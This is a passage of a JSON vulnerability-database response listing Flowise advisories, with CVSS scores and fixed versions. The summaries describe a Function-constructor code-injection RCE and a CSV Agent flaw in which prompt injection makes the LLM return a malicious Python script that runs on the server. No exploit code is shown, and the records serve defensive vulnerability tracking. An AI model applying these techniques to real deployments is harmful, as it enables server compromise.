"https://github.com/FlowiseAI/Flowise" }, { "reference_url": "https://github.com/advisories/GHSA-7944-7c6r-55vv", "reference_id": "GHSA-7944-7c6r-55vv", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-7944-7c6r-55vv" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv", "reference_id": "GHSA-7944-7c6r-55vv", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237", "reference_id": "Supabase.ts#L237", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "CVE-2025-57164", "GHSA-7944-7c6r-55vv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5hdy-fsnn-qfgq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80773?format=api", "vulnerability_id": "VCID-5pup-kgaf-3ubw", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41264", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00215", "scoring_system": "epss", "scoring_elements": "0.44078", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41264" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41264", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41264" }, { "reference_url": "https://github.com/advisories/GHSA-3hjv-c53m-58jj", "reference_id": "GHSA-3hjv-c53m-58jj", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3hjv-c53m-58jj" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj", "reference_id": "GHSA-3hjv-c53m-58jj", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T13:39:06Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41264", "GHSA-3hjv-c53m-58jj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5pup-kgaf-3ubw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/67525?format=api", "vulnerability_id": "VCID-6ufs-d346-d7ev", "summary": "A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is told to be difficult. You should upgrade the affected component.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-8026", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05306", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-8026" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8026", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8026" }, { "reference_url": "https://vuldb.com/vuln/361273", "reference_id": "361273", "reference_type": "", "scores": [ { "value": "2.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/" } ], "url": "https://vuldb.com/vuln/361273" }, { "reference_url": "https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91", "reference_id": "50a553f09aa1c7c04ce18cec13986a91", "reference_type": "", "scores": [ { "value": "2.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/" } ], "url": "https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91" }, { "reference_url": "https://vuldb.com/submit/777656", "reference_id": "777656", "reference_type": "", "scores": [ { "value": "2.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/" } ], "url": "https://vuldb.com/submit/777656" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*" }, { "reference_url": "https://vuldb.com/vuln/361273/cti", "reference_id": "cti", "reference_type": "", "scores": [ { "value": "2.6", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C" }, { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/" } ], "url": "https://vuldb.com/vuln/361273/cti" }, { "reference_url": "https://github.com/advisories/GHSA-8f47-4rh3-x44m", "reference_id": "GHSA-8f47-4rh3-x44m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8f47-4rh3-x44m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40319?format=api", "purl": "pkg:npm/flowise@3.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-zwna-stj5-3yhm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13" } ], "aliases": [ "CVE-2026-8026", "GHSA-8f47-4rh3-x44m" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6ufs-d346-d7ev" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360626?format=api", "vulnerability_id": "VCID-6wat-8akx-hycz", "summary": "Duplicate Advisory: Flowise vulnerable to RCE via Dynamic function constructor injection\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hmgh-466j-fx4c. This link is maintained to preserve external references.\n\n### Original Description\nUser-controlled input flows to an unsafe implementation of a dynamic Function constructor, allowing network attackers to run arbitrary unsandboxed JS code in the context of the host, by sending a simple POST request.", "references": [ { "reference_url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://research.jfrog.com/vulnerabilities/flowise-js-injection-remote-code-exection-jfsa-2025-001379925" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346", "reference_id": "CVE-2025-55346", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55346" }, { "reference_url": "https://github.com/advisories/GHSA-q4xx-mc3q-23x8", "reference_id": "GHSA-q4xx-mc3q-23x8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-q4xx-mc3q-23x8" } ], "fixed_packages": [], "aliases": [ "GHSA-q4xx-mc3q-23x8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6wat-8akx-hycz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80813?format=api", "vulnerability_id": "VCID-71uq-yx2j-cqak", "summary": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the password reset functionality on cloud.flowiseai.com sends a reset password link over the unsecured HTTP protocol instead of HTTPS. This behavior introduces the risk of a man-in-the-middle (MITM) attack, where an attacker on the same network as the user (e.g., public Wi-Fi) can intercept the reset link and gain unauthorized access to the victim’s account. This vulnerability is fixed in 3.1.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41275", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11586", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41275" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41275", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41275" }, { "reference_url": "https://hackerone.com/reports/1888915", "reference_id": "1888915", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/" } ], "url": "https://hackerone.com/reports/1888915" }, { "reference_url": "https://github.com/advisories/GHSA-x5w6-38gp-mrqh", "reference_id": "GHSA-x5w6-38gp-mrqh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x5w6-38gp-mrqh" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh", "reference_id": "GHSA-x5w6-38gp-mrqh", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:29:42Z/" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x5w6-38gp-mrqh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373259?format=api", "purl": "pkg:npm/flowise@3.1.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0" } ], "aliases": [ "CVE-2026-41275", "GHSA-x5w6-38gp-mrqh" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-71uq-yx2j-cqak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212306?format=api", "vulnerability_id": "VCID-8vsg-mxay-gkf7", "summary": "Duplicate Advisory: FlowiseAI Pre-Auth Arbitrary Code Execution", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164", "reference_id": "CVE-2025-57164", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57164" }, { "reference_url": "https://github.com/advisories/GHSA-3g4j-r53p-22wx", "reference_id": "GHSA-3g4j-r53p-22wx", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3g4j-r53p-22wx" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv", "reference_id": "GHSA-7944-7c6r-55vv", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "aliases": [ "GHSA-3g4j-r53p-22wx" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8vsg-mxay-gkf7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212767?format=api", "vulnerability_id": "VCID-9bht-svq8-87b4", "summary": "Flowise has Insufficient Password Salt Rounds", "references": [ { "reference_url": "https://github.com/FlowiseAI/Flowise/pull/5665", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/pull/5665" }, { "reference_url": "https://github.com/advisories/GHSA-x2g5-fvc2-gqvp", "reference_id": "GHSA-x2g5-fvc2-gqvp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x2g5-fvc2-gqvp" }, { "reference_url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp", "reference_id": "GHSA-x2g5-fvc2-gqvp", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-x2g5-fvc2-gqvp" } ], "fixed_packages": [ { "url": 